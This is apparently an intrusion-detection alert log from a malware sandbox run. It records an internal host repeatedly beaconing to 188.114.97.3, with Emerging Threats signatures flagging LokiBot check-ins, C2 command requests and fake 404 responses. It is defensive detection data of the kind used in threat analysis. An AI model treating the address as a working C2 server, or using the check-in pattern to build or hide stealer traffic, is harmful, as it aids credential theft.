2024-09-25T10:19:32.989857+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49730	188.114.97.3	80	TCP
2024-09-25T10:19:32.989857+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49730	188.114.97.3	80	TCP
2024-09-25T10:19:32.989857+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49730	188.114.97.3	80	TCP
2024-09-25T10:19:33.628049+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49730	188.114.97.3	80	TCP
2024-09-25T10:19:33.628049+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49730	188.114.97.3	80	TCP
2024-09-25T10:19:33.633464+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49730	TCP
2024-09-25T10:19:33.800027+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49731	188.114.97.3	80	TCP
2024-09-25T10:19:33.800027+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49731	188.114.97.3	80	TCP
2024-09-25T10:19:33.800027+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49731	188.114.97.3	80	TCP
2024-09-25T10:19:34.467992+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49731	188.114.97.3	80	TCP
2024-09-25T10:19:34.467992+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49731	188.114.97.3	80	TCP
2024-09-25T10:19:34.472797+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49731	TCP
2024-09-25T10:19:34.631187+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49732	188.114.97.3	80	TCP
2024-09-25T10:19:34.631187+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49732	188.114.97.3	80	TCP
2024-09-25T10:19:34.631187+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49732	188.114.97.3	80	TCP
2024-09-25T10:19:35.318075+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49732	188.114.97.3	80	TCP
2024-09-25T10:19:35.318075+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49732	188.114.97.3	80	TCP
2024-09-25T10:19:35.322924+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49732	TCP
2024-09-25T10:19:35.482687+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49733	188.114.97.3	80	TCP
2024-09-25T10:19:35.482687+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49733	188.114.97.3	80	TCP
2024-09-25T10:19:35.482687+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49733	188.114.97.3	80	TCP
2024-09-25T10:19:36.366610+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49733	188.114.97.3	80	TCP
2024-09-25T10:19:36.366610+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49733	188.114.97.3	80	TCP
2024-09-25T10:19:36.371522+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49733	TCP
2024-09-25T10:19:36.537688+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49734	188.114.97.3	80	TCP
2024-09-25T10:19:36.537688+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49734	188.114.97.3	80	TCP
2024-09-25T10:19:36.537688+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49734	188.114.97.3	80	TCP
2024-09-25T10:19:37.190467+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49734	188.114.97.3	80	TCP
2024-09-25T10:19:37.190467+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49734	188.114.97.3	80	TCP
2024-09-25T10:19:37.195299+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49734	TCP
2024-09-25T10:19:37.356070+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49735	188.114.97.3	80	TCP
2024-09-25T10:19:37.356070+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49735	188.114.97.3	80	TCP
2024-09-25T10:19:37.356070+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49735	188.114.97.3	80	TCP
2024-09-25T10:19:38.140430+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49735	188.114.97.3	80	TCP
2024-09-25T10:19:38.140430+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49735	188.114.97.3	80	TCP
2024-09-25T10:19:38.145206+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49735	TCP
2024-09-25T10:19:39.239881+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49736	188.114.97.3	80	TCP
2024-09-25T10:19:39.239881+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49736	188.114.97.3	80	TCP
2024-09-25T10:19:39.239881+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49736	188.114.97.3	80	TCP
2024-09-25T10:19:39.901885+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49736	188.114.97.3	80	TCP
2024-09-25T10:19:39.901885+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49736	188.114.97.3	80	TCP
2024-09-25T10:19:39.906710+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49736	TCP
2024-09-25T10:19:40.078687+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49737	188.114.97.3	80	TCP
2024-09-25T10:19:40.078687+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49737	188.114.97.3	80	TCP
2024-09-25T10:19:40.078687+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49737	188.114.97.3	80	TCP
2024-09-25T10:19:40.752516+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49737	188.114.97.3	80	TCP
2024-09-25T10:19:40.752516+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49737	188.114.97.3	80	TCP
2024-09-25T10:19:40.757426+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49737	TCP
2024-09-25T10:19:40.911451+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49738	188.114.97.3	80	TCP
2024-09-25T10:19:40.911451+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49738	188.114.97.3	80	TCP
2024-09-25T10:19:40.911451+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49738	188.114.97.3	80	TCP
2024-09-25T10:19:41.580058+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49738	188.114.97.3	80	TCP
2024-09-25T10:19:41.580058+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49738	188.114.97.3	80	TCP
2024-09-25T10:19:41.586005+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49738	TCP
2024-09-25T10:19:41.735560+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49739	188.114.97.3	80	TCP
2024-09-25T10:19:41.735560+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49739	188.114.97.3	80	TCP
2024-09-25T10:19:41.735560+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49739	188.114.97.3	80	TCP
2024-09-25T10:19:42.413942+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49739	188.114.97.3	80	TCP
2024-09-25T10:19:42.413942+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49739	188.114.97.3	80	TCP
2024-09-25T10:19:42.418949+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49739	TCP
2024-09-25T10:19:42.570720+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49740	188.114.97.3	80	TCP
2024-09-25T10:19:42.570720+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49740	188.114.97.3	80	TCP
2024-09-25T10:19:42.570720+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49740	188.114.97.3	80	TCP
2024-09-25T10:19:43.241128+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49740	188.114.97.3	80	TCP
2024-09-25T10:19:43.241128+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49740	188.114.97.3	80	TCP
2024-09-25T10:19:43.246416+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49740	TCP
2024-09-25T10:19:43.399885+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49741	188.114.97.3	80	TCP
2024-09-25T10:19:43.399885+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49741	188.114.97.3	80	TCP
2024-09-25T10:19:43.399885+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49741	188.114.97.3	80	TCP
2024-09-25T10:19:44.027788+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49741	188.114.97.3	80	TCP
2024-09-25T10:19:44.027788+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49741	188.114.97.3	80	TCP
2024-09-25T10:19:44.032597+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49741	TCP
2024-09-25T10:19:44.190956+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49742	188.114.97.3	80	TCP
2024-09-25T10:19:44.190956+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49742	188.114.97.3	80	TCP
2024-09-25T10:19:44.190956+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49742	188.114.97.3	80	TCP
2024-09-25T10:19:44.852239+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49742	188.114.97.3	80	TCP
2024-09-25T10:19:44.852239+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49742	188.114.97.3	80	TCP
2024-09-25T10:19:44.857234+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49742	TCP
2024-09-25T10:19:45.016789+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49743	188.114.97.3	80	TCP
2024-09-25T10:19:45.016789+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49743	188.114.97.3	80	TCP
2024-09-25T10:19:45.016789+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49743	188.114.97.3	80	TCP
2024-09-25T10:19:45.666427+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49743	188.114.97.3	80	TCP
2024-09-25T10:19:45.666427+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49743	188.114.97.3	80	TCP
2024-09-25T10:19:45.671293+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49743	TCP
2024-09-25T10:19:45.828745+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49744	188.114.97.3	80	TCP
2024-09-25T10:19:45.828745+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49744	188.114.97.3	80	TCP
2024-09-25T10:19:45.828745+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49744	188.114.97.3	80	TCP
2024-09-25T10:19:46.545472+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49744	188.114.97.3	80	TCP
2024-09-25T10:19:46.545472+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49744	188.114.97.3	80	TCP
2024-09-25T10:19:46.551465+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49744	TCP
2024-09-25T10:19:46.711712+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49745	188.114.97.3	80	TCP
2024-09-25T10:19:46.711712+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49745	188.114.97.3	80	TCP
2024-09-25T10:19:46.711712+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49745	188.114.97.3	80	TCP
2024-09-25T10:19:47.442427+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49745	188.114.97.3	80	TCP
2024-09-25T10:19:47.442427+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49745	188.114.97.3	80	TCP
2024-09-25T10:19:47.447756+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49745	TCP
2024-09-25T10:19:47.595407+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49746	188.114.97.3	80	TCP
2024-09-25T10:19:47.595407+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49746	188.114.97.3	80	TCP
2024-09-25T10:19:47.595407+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49746	188.114.97.3	80	TCP
2024-09-25T10:19:48.277146+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49746	188.114.97.3	80	TCP
2024-09-25T10:19:48.277146+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49746	188.114.97.3	80	TCP
2024-09-25T10:19:48.282001+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49746	TCP
2024-09-25T10:19:48.437321+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49747	188.114.97.3	80	TCP
2024-09-25T10:19:48.437321+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49747	188.114.97.3	80	TCP
2024-09-25T10:19:48.437321+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49747	188.114.97.3	80	TCP
2024-09-25T10:19:49.076736+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49747	188.114.97.3	80	TCP
2024-09-25T10:19:49.076736+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49747	188.114.97.3	80	TCP
2024-09-25T10:19:49.081572+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49747	TCP
2024-09-25T10:19:49.234722+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49748	188.114.97.3	80	TCP
2024-09-25T10:19:49.234722+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49748	188.114.97.3	80	TCP
2024-09-25T10:19:49.234722+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49748	188.114.97.3	80	TCP
2024-09-25T10:19:49.885438+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49748	188.114.97.3	80	TCP
2024-09-25T10:19:49.885438+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49748	188.114.97.3	80	TCP
2024-09-25T10:19:49.890230+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49748	TCP
2024-09-25T10:19:50.049266+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49749	188.114.97.3	80	TCP
2024-09-25T10:19:50.049266+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49749	188.114.97.3	80	TCP
2024-09-25T10:19:50.049266+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49749	188.114.97.3	80	TCP
2024-09-25T10:19:50.708565+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49749	188.114.97.3	80	TCP
2024-09-25T10:19:50.708565+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49749	188.114.97.3	80	TCP
2024-09-25T10:19:50.713445+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49749	TCP
2024-09-25T10:19:50.858143+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49750	188.114.97.3	80	TCP
2024-09-25T10:19:50.858143+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49750	188.114.97.3	80	TCP
2024-09-25T10:19:50.858143+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49750	188.114.97.3	80	TCP
2024-09-25T10:19:51.507840+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49750	188.114.97.3	80	TCP
2024-09-25T10:19:51.507840+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49750	188.114.97.3	80	TCP
2024-09-25T10:19:51.512658+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49750	TCP
2024-09-25T10:19:51.659793+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49751	188.114.97.3	80	TCP
2024-09-25T10:19:51.659793+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49751	188.114.97.3	80	TCP
2024-09-25T10:19:51.659793+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49751	188.114.97.3	80	TCP
2024-09-25T10:19:52.350336+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49751	188.114.97.3	80	TCP
2024-09-25T10:19:52.350336+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49751	188.114.97.3	80	TCP
2024-09-25T10:19:52.356086+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49751	TCP
2024-09-25T10:19:52.634585+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49752	188.114.97.3	80	TCP
2024-09-25T10:19:52.634585+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49752	188.114.97.3	80	TCP
2024-09-25T10:19:52.634585+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49752	188.114.97.3	80	TCP
2024-09-25T10:19:53.355659+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49752	188.114.97.3	80	TCP
2024-09-25T10:19:53.355659+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49752	188.114.97.3	80	TCP
2024-09-25T10:19:53.360531+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49752	TCP
2024-09-25T10:19:53.523329+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49753	188.114.97.3	80	TCP
2024-09-25T10:19:53.523329+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49753	188.114.97.3	80	TCP
2024-09-25T10:19:53.523329+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49753	188.114.97.3	80	TCP
2024-09-25T10:19:54.186780+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49753	188.114.97.3	80	TCP
2024-09-25T10:19:54.186780+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49753	188.114.97.3	80	TCP
2024-09-25T10:19:54.191774+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49753	TCP
2024-09-25T10:19:54.536452+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49754	188.114.97.3	80	TCP
2024-09-25T10:19:54.536452+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49754	188.114.97.3	80	TCP
2024-09-25T10:19:54.536452+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49754	188.114.97.3	80	TCP
2024-09-25T10:19:55.325978+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49754	188.114.97.3	80	TCP
2024-09-25T10:19:55.325978+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49754	188.114.97.3	80	TCP
2024-09-25T10:19:55.331030+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49754	TCP
2024-09-25T10:19:55.485678+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49755	188.114.97.3	80	TCP
2024-09-25T10:19:55.485678+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49755	188.114.97.3	80	TCP
2024-09-25T10:19:55.485678+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49755	188.114.97.3	80	TCP
2024-09-25T10:19:56.126948+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49755	188.114.97.3	80	TCP
2024-09-25T10:19:56.126948+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49755	188.114.97.3	80	TCP
2024-09-25T10:19:56.131913+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49755	TCP
2024-09-25T10:19:56.301649+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49756	188.114.97.3	80	TCP
2024-09-25T10:19:56.301649+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49756	188.114.97.3	80	TCP
2024-09-25T10:19:56.301649+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49756	188.114.97.3	80	TCP
2024-09-25T10:19:57.009360+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49756	188.114.97.3	80	TCP
2024-09-25T10:19:57.009360+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49756	188.114.97.3	80	TCP
2024-09-25T10:19:57.014226+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49756	TCP
2024-09-25T10:19:57.172763+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49757	188.114.97.3	80	TCP
2024-09-25T10:19:57.172763+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49757	188.114.97.3	80	TCP
2024-09-25T10:19:57.172763+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49757	188.114.97.3	80	TCP
2024-09-25T10:19:58.849605+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49757	188.114.97.3	80	TCP
2024-09-25T10:19:58.849605+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49757	188.114.97.3	80	TCP
2024-09-25T10:19:58.854920+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49757	TCP
2024-09-25T10:19:59.000979+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49758	188.114.97.3	80	TCP
2024-09-25T10:19:59.000979+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49758	188.114.97.3	80	TCP
2024-09-25T10:19:59.000979+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49758	188.114.97.3	80	TCP
2024-09-25T10:19:59.726091+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49758	188.114.97.3	80	TCP
2024-09-25T10:19:59.726091+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49758	188.114.97.3	80	TCP
2024-09-25T10:19:59.736725+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49758	TCP
2024-09-25T10:19:59.891904+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49759	188.114.97.3	80	TCP
2024-09-25T10:19:59.891904+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49759	188.114.97.3	80	TCP
2024-09-25T10:19:59.891904+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49759	188.114.97.3	80	TCP
2024-09-25T10:20:00.560306+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49759	188.114.97.3	80	TCP
2024-09-25T10:20:00.560306+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49759	188.114.97.3	80	TCP
2024-09-25T10:20:00.565087+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49759	TCP
2024-09-25T10:20:00.718978+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49760	188.114.97.3	80	TCP
2024-09-25T10:20:00.718978+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49760	188.114.97.3	80	TCP
2024-09-25T10:20:00.718978+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49760	188.114.97.3	80	TCP
2024-09-25T10:20:01.361671+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49760	188.114.97.3	80	TCP
2024-09-25T10:20:01.361671+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49760	188.114.97.3	80	TCP
2024-09-25T10:20:01.366740+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49760	TCP
2024-09-25T10:20:01.526168+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49761	188.114.97.3	80	TCP
2024-09-25T10:20:01.526168+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49761	188.114.97.3	80	TCP
2024-09-25T10:20:01.526168+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49761	188.114.97.3	80	TCP
2024-09-25T10:20:02.229063+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49761	188.114.97.3	80	TCP
2024-09-25T10:20:02.229063+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49761	188.114.97.3	80	TCP
2024-09-25T10:20:02.233938+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49761	TCP
2024-09-25T10:20:02.392071+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49763	188.114.97.3	80	TCP
2024-09-25T10:20:02.392071+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49763	188.114.97.3	80	TCP
2024-09-25T10:20:02.392071+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49763	188.114.97.3	80	TCP
2024-09-25T10:20:03.088731+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49763	188.114.97.3	80	TCP
2024-09-25T10:20:03.088731+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49763	188.114.97.3	80	TCP
2024-09-25T10:20:03.093667+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49763	TCP
2024-09-25T10:20:03.257255+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49764	188.114.97.3	80	TCP
2024-09-25T10:20:03.257255+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49764	188.114.97.3	80	TCP
2024-09-25T10:20:03.257255+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49764	188.114.97.3	80	TCP
2024-09-25T10:20:03.904946+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49764	188.114.97.3	80	TCP
2024-09-25T10:20:03.904946+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49764	188.114.97.3	80	TCP
